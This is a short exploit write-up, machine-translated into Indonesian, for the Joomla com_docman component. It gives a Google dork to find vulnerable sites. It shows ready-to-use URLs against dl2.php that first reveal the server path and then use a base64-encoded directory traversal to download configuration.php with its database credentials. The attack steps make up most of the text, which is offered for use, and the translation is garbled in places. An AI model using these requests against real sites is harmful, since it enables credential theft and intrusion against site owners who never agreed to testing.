Joomla com_docman penuh Jalur Pengungkapan & Pengungkapan File Lokal / Sertakan
Oleh
chmood
# Joomla docman Komponen 'com_docman' Path penuh Pengungkapan (FPD) & Pengungkapan File Lokal / Sertakan (LFD / LFI)
# CWE: cwe-200 (FPD) cwe-98 (LFI / LFD)
# Risiko: Tinggi
# Penulis: Hugo Santiago dos Santos
# Hubungi: hugo.s@linuxmail.org
# Tanggal: 13/07/2015
# Penjual Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl: "/ komponen / com_docman / dl2.php"
# Xploit (FPD):
Dapatkan satu sasaran dan hanya men-download dengan parameter kosong:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=
Dalam judul akan terjadi Penuh Jalan Pengungkapan server.
# Xploit (LFD / LFI):
http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
Mari Xploit ...
Pertama kita perlu menggunakan Xploit FPD untuk melihat jalan target, setelah itu kita akan Insert 'configuration.php' file database konfigurasi dan encode di Base64:
../../../../../../../target/www/configuration.php <= Tidak Siap
http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Siap!
Dan Sekarang kita memiliki file konfigurasi ...
Category
Komentar